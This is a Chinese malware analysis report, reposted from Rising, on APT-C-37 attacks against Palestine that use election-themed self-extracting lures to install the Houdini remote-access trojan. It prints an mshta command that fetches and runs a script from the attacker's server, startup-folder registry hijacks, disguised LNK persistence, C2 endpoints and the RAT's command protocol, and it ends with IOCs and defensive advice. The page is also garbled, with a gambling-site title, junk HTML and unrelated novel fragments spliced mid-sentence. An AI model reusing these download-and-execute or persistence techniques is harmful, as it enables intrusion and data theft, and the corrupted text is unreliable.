澳门威斯人游戏平台

  • <tr id='cs1atx'><strong id='cs1atx'></strong><small id='cs1atx'></small><button id='cs1atx'></button><li id='cs1atx'><noscript id='cs1atx'><big id='cs1atx'></big><dt id='cs1atx'></dt></noscript></li></tr><ol id='cs1atx'><option id='cs1atx'><table id='cs1atx'><blockquote id='cs1atx'><tbody id='cs1atx'></tbody></blockquote></table></option></ol><u id='cs1atx'></u><kbd id='cs1atx'><kbd id='cs1atx'></kbd></kbd>

    <code id='cs1atx'><strong id='cs1atx'></strong></code>

    <fieldset id='cs1atx'></fieldset>
          <span id='cs1atx'></span>

              <ins id='cs1atx'></ins>
              <acronym id='cs1atx'><em id='cs1atx'></em><td id='cs1atx'><div id='cs1atx'></div></td></acronym><address id='cs1atx'><big id='cs1atx'><big id='cs1atx'></big><legend id='cs1atx'></legend></big></address>

              <i id='cs1atx'><div id='cs1atx'><ins id='cs1atx'></ins></div></i>
              <i id='cs1atx'></i>
            1. <dl id='cs1atx'></dl>
              1. <blockquote id='cs1atx'><q id='cs1atx'><noscript id='cs1atx'></noscript><dt id='cs1atx'></dt></q></blockquote><noframes id='cs1atx'><i id='cs1atx'></i>
                 
                 
                APT组织“拍拍熊”对巴勒斯坦政府攻击事件※报告
                ——转自瑞星
                发布人:系统管理员  发布时间:2019-11-18

                一、背景介绍

                近日,瑞星威胁情报中心捕获到两起针对巴勒斯坦大选的APT攻击事件,通过对攻击手法的ぷ分析来看,发现这两起攻击ω 均与APT组织“APT-C-37”(又称“拍拍熊”)有关。该组织通过投放伪装成巴勒斯坦选举会议的相关文档等方式风之力进行远程控制攻击,其意图以攻【击巴勒斯坦政府为主,目的在于影响巴勒斯※坦国家大选。

                据悉,“拍拍熊”是一个中√东地区背景,使用阿拉伯语且有政治动机的APT攻击组织,自2015年被发现至今,频繁进行有组织、有计划、针对性↑的不间断攻击,特别是◤针对巴勒斯坦、以色列、埃及等中东【动乱国家进行攻击。“拍拍熊”组织一直保持着积极的活跃度,典型战狂大笑着直接朝道尘子一步步走去的攻击目标包括政府机构、武装组织领导、媒体人士、政治活动家和外交官▆等。

                瑞星安全专家介绍」,此■次截获的APT攻击事件应与近期的巴勒斯坦大三号选有关,通过截获的两起诱饵文件发现,其主题为选举委员会会议和Majdalani严重怀疑阿巴斯总统关于总统∑ 选举。攻击者将带有木马病毒的诱饵文〗档通过邮件等方式进行投放,而该病毒可自解压,一旦受害者运行了自解压的木马文件,就会被攻击者□ 远程控制,从而可进行各种不法操作。

                由于“拍拍熊”组织针对的目标都是△具有重大信息资产,如国家△军事、情报、战略部门,以及如金融、能源等影响国计民生的行业,因此国内相关政府机构他去了北方葬魂崖和企业单位务必要◎引起重视「,加强防御措施。

                二、攻击事件

                这两起攻击事件均是□ 针对巴勒斯坦,攻击者投放的诱饵文档都和巴勒斯坦大选有关。第一个¤诱饵文档的主题是:选举委员会会议。第二个@诱饵文档的主题是:Majdalani严重怀疑阿巴斯总统关于总统选举。

                图:诱饵文档1
                图:诱饵文档2

                三、技术分析

                3.1 攻击流程

                图:攻击流程

                3.2 自解压文卐件

                攻击者投放的病毒样本∴为SFX(自解压)文件,并且图标被伪装成WORD图标。在自解@ 压文件中有一个和巴勒斯坦大选相关¤的诱饵文档和一段自解压命◥令。

                文件名?????? ???? ?????????? – ????? ?????? .exe
                中文翻译选举委员会会议-北领地.exe
                MD56E62856152EB198B457487E1EED94D76
                文件大小396.71KB(406234 bytes)
                文件格式Win32 EXE
                创建时间2019-4-27
                VT首次上传时间随后目光直直2019-11-05
                VT检测结果37 / 70
                涉及URLhttp://192.119.111.4/xx/dv
                内含诱饵文档名GSHword.docx
                表:自解压文█件1信息
                图:自解压文█件1
                文件名????????? ???? ????? ?????? ???? ???? ?????????? ????????.exe
                中文翻译Majdalani严重怀疑阿巴斯总统关于总统选举.exe
                MD54FA306739FD3ECC75B0EE202A614061D
                文件大小389.28KB (398627bytes)
                文件格式Win32 EXE
                创建时间2019-4-27
                VT首次上传时间2019-11-07
                VT检测结果27 / 70
                涉及URLhttp://192.119.111.4/xx/dv
                内含诱饵文档名wordwatan.docx
                表:自解压⌒ 文件2信息
                图:自解压灵魂印记文件2

                自解←压命令:

                通过分析自解压≡命令,可以得知当受害者运行自解压文件后,病毒样本会执等飞升神界行如下操作:

                图:自解压命令

                ①攻击者为了达到迷惑受害ぷ者的目的,会先将诱饵文档释放在%temp%路径下,并打开。

                文件名GSHword.docx
                MD5D99F2923C81E703C6345D30BF0E15CD9
                所处目录%temp%
                VT检测结果0 / 59
                表:诱饵文档1:GSHword.docx的信息
                文件名wordwatan.docx
                MD57E55C6E273FE45336299A7AAA46D5A2B
                所处目录%temp%
                VT检测结果0 / 62
                表:诱饵文档2:wordwatan.docx的信息

                ②利用mshta.exe执行http://192.119.111.4/xx/dv脚本。

                ③为了使得攻击保持持久性,攻击者在启动菜单中下创建一个LNK文件。此LNK文件被伪装成HelPPane.lnk(windows自带帮助√程序),但是№它的目标属性指向:

                C:\Windows\System32\mshta.exe  

                http://192.119.111.4/xx/dv。

                文件名HelPPane.lnk
                MD5F4355A61D7AC60D3282A9A207A643589
                目标属性C:\Windows\System32\mshta.exe  http://192.119.111.4/xx/dv
                所处目录%appdata% \Microsoft\Windows\Start Menu\Programs\Startup
                VT检测结果样本←无上报
                表:HelPPane.lnk 信息
                图:HelPPane.lnk的目标属性

                3.3 dv.vbs

                来源http://192.119.111.4/xx/dv
                MD57BCBE8CC5A05DF9FCEA4E7E52BD00D79
                执行方式C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv
                涉及URLhttp://192.119.111.4/xx/dv.zip
                表:dv.vbs 信息

                如下是dv.vbs执行的恶意操作:

                ①在%temp%目录中创建xxxx.tmp(xxxx表示随机命↓名)。

                ②从http://192.119.111.4/xx/dv.zip中获取vbs脚本并存于xxxx.tmp中。

                ③将xxxx.tmp文件的后缀名改为vbs,利用powershell.exe执行xxxx.vbs。

                ④最后将xxxx.vbs文件删除。

                图:dv.vbs脚本文件

                3.4 dv.zip.vbs

                文件名xxxx.tmp(xxxx表示随机命名)
                MD59094DF33AA0D6B1DD4EFAF34E91A05C4
                所处目录%temp%
                来源http://192.119.111.4/xx/dv.zip
                涉及URLhttp://192.119.111.4/xx/f_Skoifa.vbs
                表:dv.zip.vbs 信息

                如下是dv.zip.vbs执行的恶意操作:

                3.4.1 下载f_Skoifa.vbs脚本

                下载http://192.119.111.4/xx/f_Skoifa.vbs脚本文件,存于%USERPROFILE%\AppData\Local中。

                文件名f_Skoifa.vbs
                MD5FD5BA76F85C9746F7A326B954874F5A6
                所处目录%USERPROFILE%\AppData\Local
                来源http://192.119.111.4/xx/f_Skoifa.vbs
                表:f_Skoifa.vbs 信息
                图:下载f_Skoifa.vbs

                3.4.2 创建Help文件夹

                判断%USERPROFILE%\AppData\Roaming\Microsoft\Windows\中是否存或者说在Help文件夹,没有则创建。

                文件名Help
                所处目录%USERPROFILE%\AppData\Roaming\Microsoft\Windows
                子文件HelpPane.lnk
                表:Help 信息
                图:创建Help文件夹

                3.4.3 转移启动菜单↓为Help文件夹

                (1)在注册表HKEY_CURRENT_USER中创建 SOFTWARE\Microsoft\Windows\CurrentVersion\Help。

                (2)更改Windows启动目录为Help文件夹:

                ①在注册表HKEY_CURRENT_USER中修改 SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders中的

                Startup值为%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help 。

                ②在注册表HKEY_CURRENT_USER中修改 SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders中的

                Startup值为%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help。

                图:更改注册表

                3.4.4 创建指向f_Skoifa.vbs 的HelpPane.lnk

                在%USERPROFILE%\AppData\Roaming\Microsoft\Windows\help文件夹中创建这怎么可能一个LNK文件。此LNK文件被伪装成

                HelpPane.lnk(windows自带帮★助程序),它的属性目标指向

                C:\Windows\system32\wscript.exe  %USERPROFILE%\AppData\Local\f_Skoifa.vbs。

                文件名HelpPane.lnk
                MD52818ECDE79CEDC1E181D7B69F14840A6
                目标属性C:\Windows\System32\wscript.exe  %USERPROFILE%\AppData\Local\f_Skoifa.vbs
                所处目录%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help
                VT检测结果样本无上报
                表:HelpPane.lnk 信息
                图:创建快捷方式文件

                3.4.5 更改f_Skoifa.vbs和HelpPane.lnk的文件属性

                攻击者为◤了保持持久性,将%USERPROFILE%\AppData\Local\ f_Skoifa.vbs和

                %USERPROFILE%\AppData\Roaming\Microsoft\Windows\help\HelpPane.lnk的文件属性更改为系统属性和隐藏属性。

                图:更改文★件属性

                3.5 f_Skoifa.vbs

                f_Skoifa.vbs是个被加密的远控木马,解密后对其进行技术分析发现其就是看着墨麒麟远控木马Houdini。

                文件名f_Skoifa.vbs
                MD5FD5BA76F85C9746F7A326B954874F5A6
                所处目录%USERPROFILE%\AppData\Local
                来源http://192.119.111.4/xx/f_Skoifa.vbs
                涉及URLhttp://192.119.111.4:4587/is-ready
                http:// 192.119.111.4:4587 / is-enum-driver
                http:// 192.119.111.4:4587 / is-sending
                http:// 192.119.111.4:4587 / is-enum-faf
                http:// 192.119.111.4:4587 / is-enum-process
                表:_Skoifa.vbs 信息
                图:f_Skoifa.vbs密文
                图:f_Skoifa.vbs明文

                如下是f_Skoifa.vbs的详细分析≡:

                3.5.1远■控指令分析

                样本首先和C2地址http://192.119.111.4:4587/is-ready建立连接,然后使用WMI的WQL语句来获取受害者机器上的有效信息,将信息发送到C2地址上。接着等待攻击者响ㄨ应,将远控指令发送到受害者机器上以便进行下一步恶意操作◥。

                发送信息的记录结构为≡:

                逻辑磁盘卷序列号<|>电脑名<|>用户名<|>操作系统版金甲战神一声长笑本<|>plus<|>防病毒产品名(如果没有防病♂毒产品,则记录为nan-av)。

                例如:"7FC8F3B9<|>123-PC<|>Administrator<|>Microsoft Windows 7 旗舰版 <|>plus<|>nan-av<|>"。

                图:发送信息和接收远控指令

                3.5.2 八个远〓控指令名分析

                攻击者发送过来的远控木马的攻击指令总计8个,每个远控指令的结构为:

                远控指令』名<|>指令参数1(<|>指令参数2)。

                样本从远控指令中解析出远控指『令名◆,然后根据远控@ 指令名对受害者机器发动相应地攻击。

                下面分别对这8个远◢控指令名ζ进行详细分析。

                图:远控指令

                ①远控指令→名:excecute

                调用VBScript中的execute函数,直接执@行指令参数1。指令参数1可以是一段pwoershell或其他。

                图:远控々指令名excecute

                ②远控指令♀名:send

                远控指令↑名send的作用是下载文件以执々行。

                远控指》令名▲send对应的远控指令结构为:

                send<|>fileurl<|>filedir。包含两个指令参数,指令参数1表示C2地址的文件路径,指令参数2表示受害者机器上的文件目录看着这魁梧大汉。

                数据传输方式↘为POST,从http:// 192.119.111.4:4587 / is-sending<|> fileurl(指令参数1)中获取文♀件,

                文件命名为fileurl(指令参数1)斜线(\)后的字符。文件存储于filedir(指令参数2)中。

                下载前判断受害者机器上是否存在被下载〇的文件,如果存在则∮将其删除,然后重新▲下载,下载完后利用wscript.shell将文件执行起来。

                图:远控同时指令名send
                图:远控指令名send对应的操作∏函数

                ③远控指令名:recv

                此次攻击中,远控指令名recv的对应的︼操作函数upload并不存在。但是从№之前的攻击案例中可以得知,这个远控指令的作用是更新载荷。

                图:远控指令名recv

                ④远控指令名:enum-driver

                远控指令名enum-driver的作用是◇向C2地址(http:// 192.119.111.4:4587 / is-enum-driver)发送由受害者机器上的磁盘信息组成的列表。

                发送▲列表的记录结构为:

                磁盘1路径|磁盘1类型<|>(磁盘2路径|磁盘2类型<|>……磁盘n路径|磁盘n类型<|>)。
                图:远控指令名enum-driver
                图:远控指令名enum-driver对应▃的操作函数

                ⑤远控指令名:enum-faf

                远控指令名enum-faf的作轰用是向C2地址(http:// 192.119.111.4:4587 / is-enum-faf)发送由指定文件(指令参数1)下的文件夹信息和文件信息组成的列表。

                发送列表的记录结构为:

                指定文件 <|>子文件夹1的名称||d|子文件夹1的属性<|>……<|>子文件夹n的名称|

                |d|子文件夹n的属性<|>子文件1的名称|子文件1的大小|f|子文件1的属性<|>……子文件n的名称

                |子文件n的大小|f|子文件n的属性<|>。

                图:远控指令名enum-faf
                图:远控命令enum-faf对应的︼操作函数

                ⑥远控指令名:enum-process

                远控指令名enum-process对应的作用是向C2地址(http:// 192.119.111.4:4587 / is-enum-process)发送由受害者机器上的进程名,进程ID和进程对应的∮可执行文件路径组成的列表。

                发送列表的记录结构为:

                进程1的名称|进程1的ID|进程1对应的可∩执行文件地址<|>……进程n的名称|进程n的ID|进程n对应的可执行文件地址<|>。
                图:远控指令名enum-process
                图:远控指令名enum-process对应的函数操作

                ⑦远控指令名:delete

                此次攻击中,远控指令名delete对谁也不知道他在想些什么应的操作函数deletefaf并不存在。但是通过分析之前的案╱例可以得知这个指令的作用是删除文件。

                图:远控指令名delete

                ⑧远控指令名:exit-process

                远控指令名exit-process的作用是通过进程ID(指令参数1)终止指定▂进程。

                图:远控指令名exit-process
                图:远控指令名exit-process对应的操作函数

                四、总结

                此次最新的攻击案例中涉及到的攻击手法和今年其他相关安全厂商披露的攻击事件中所用〒到的技术有很大的重合性。攻击者熟Ψ练使用阿拉伯语,针对目标何林在一旁低声解释着为巴勒斯坦,攻击手法采用SFX(自解压文件)和mshta.exe去远程执行脚本文件,最终投递Houdini远控木马。

                APT攻击有↙着针对性强、组织严密、持续卐时间长、高隐蔽性和间接攻击的显著特征,针对的目标都是具有重大信息资产,如国家军事、情报、战略部门和影响国计民生的行业◆如金融、能源等,国内相关政府机构和企业单位务必要引①起重视,加强防御措施。

                五、预防措施

                1.不打开可疑邮件,不下载可疑附︼件。

                此类攻击最开始的入口通常都◣是钓鱼邮件,钓鱼邮件非常具有迷惑⌒性,因此需要用户提高警惕,企业更是要加强员工网络安全意识的培训。

                2.部署网络安全态势感知、预警系统等网↓关安全产品。

                网关安全产品可利用√威胁情报追溯威胁行为ω轨迹,帮助用户进行威胁行为分析、定位威胁源和目的,追溯攻击的手段一阵阵强烈和路径,从源头▃解决网络威胁,最大范围∞内发现被攻击的节点,帮助企业更快↓响应和处理。

                3.安装有效的杀毒软件,拦截查杀上空恶意文档和木马病毒。

                杀毒软件可拦截恶意文档和木马病毒,如果用☉户不小心下载了恶意文档,杀毒软件可拦截查杀,阻止◆病毒运行,保护用户的终端安全。

                4.及时修补系统补丁和重要软件的补丁。

                六、IOC信息

                URL

                 http://192.119.111.4:4587 / is-enum-driver

                http://192.119.111.4:4587 / is-sending

                http://192.119.111.4:4587 / is-enum-faf

                http://192.119.111.4:4587 / is-enum-process

                MD5

                6E62856152EB198B457487E1EED94D767BCBE8CC5A05DF9FCEA4E7E52BD00D799094DF33AA0D6B1DD4EFAF34E91A05C4FD5BA76F85C

                9746F7A326B954874F5A64FA306739FD3ECC75B0EE202A614061D2818ECDE79CEDC1E181D7B69F14840A6F4355A61D7AC60D3282A9A

                207A643589